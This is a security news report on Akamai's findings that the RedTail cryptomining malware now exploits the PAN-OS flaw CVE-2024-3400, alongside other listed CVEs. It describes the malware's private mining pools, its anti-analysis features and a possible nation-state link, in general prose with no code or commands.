The threat actors behind the RedTail cryptocurrency mining malware have added a previously reported security issue harming Palo Alto Networks firewalls to their attack arsenal.
The inclusion of the PAN-OS vulnerability to its toolbox has been complimented by upgrades to the malware, which now integrates new anti-analysis measures, according to results from online infrastructure and security firm Akamai.
"The attackers have taken a step forward by employing private crypto-mining pools for greater control over mining outcomes despite the increased operational and financial costs," security researchers Ryan Barnett, Stiv Kupchik, and Maxim Zavodchik said in a technical report shared with The Hacker News.
The infection sequence found by Akamai leverages a now-patched vulnerability in PAN-OS tagged as CVE-2024-3400 (CVSS score: 10.0) that may enable an unauthenticated attacker to execute arbitrary code with root capabilities on the firewall.
A successful exploitation is followed by the execution of instructions meant to obtain and execute a bash shell script from an external domain that, in turn, is responsible for downloading the RedTail payload dependent on the CPU architecture.
Other propagation vectors for RedTail include the exploitation of known security weaknesses in TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), and VMWare Workspace ONE Access and Identity Manager (CVE-2022-22954).
RedTail was initially disclosed by security researcher Patryk Machowiak in January 2024 in reference to a campaign that exploited the Log4Shell vulnerability (CVE-2021-44228) to distribute the malware on Unix-based computers.
Then in March 2024, Barracuda Networks published information of cyber assaults targeting holes in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to install Mirai botnet versions as well as deficiencies in ThinkPHP to deploy RedTail.
The current version of the miner found in April packs in major upgrades in that it has an encrypted mining configuration that's utilized to run the integrated XMRig miner.
Another significant alteration is the removal of a cryptocurrency wallet, suggesting that the threat actors may have migrated to a private mining pool or a pool proxy to gain financial rewards.
"The configuration also shows that the threat actors are trying to optimize the mining operation as much as possible, indicating a deep understanding of crypto-mining," the researchers stated.
"Unlike the last RedTail strain revealed in early 2024, this virus exploits enhanced evasion and persistence capabilities. It forks itself numerous times to hamper analysis by debugging its process and destroys each instance of [GNU Debugger] it discovers."
Akamai highlighted RedTail as having a high degree of polish, a characteristic not frequently noticed among bitcoin miner malware families out there in the wild.
Exactly who is behind the cryptocurrency mining software is presently not known, however the use of private crypto-mining pools mimics a method employed by the North Korea-linked Lazarus Group, which has a history of organizing wide-ranging cyber assaults for financial benefit, the business stated.
"The investments required to run a private crypto-mining operation are significant, including staffing, infrastructure, and obfuscation," the researchers found. "This sophistication may be indicative of a nation-state-sponsored attack group."
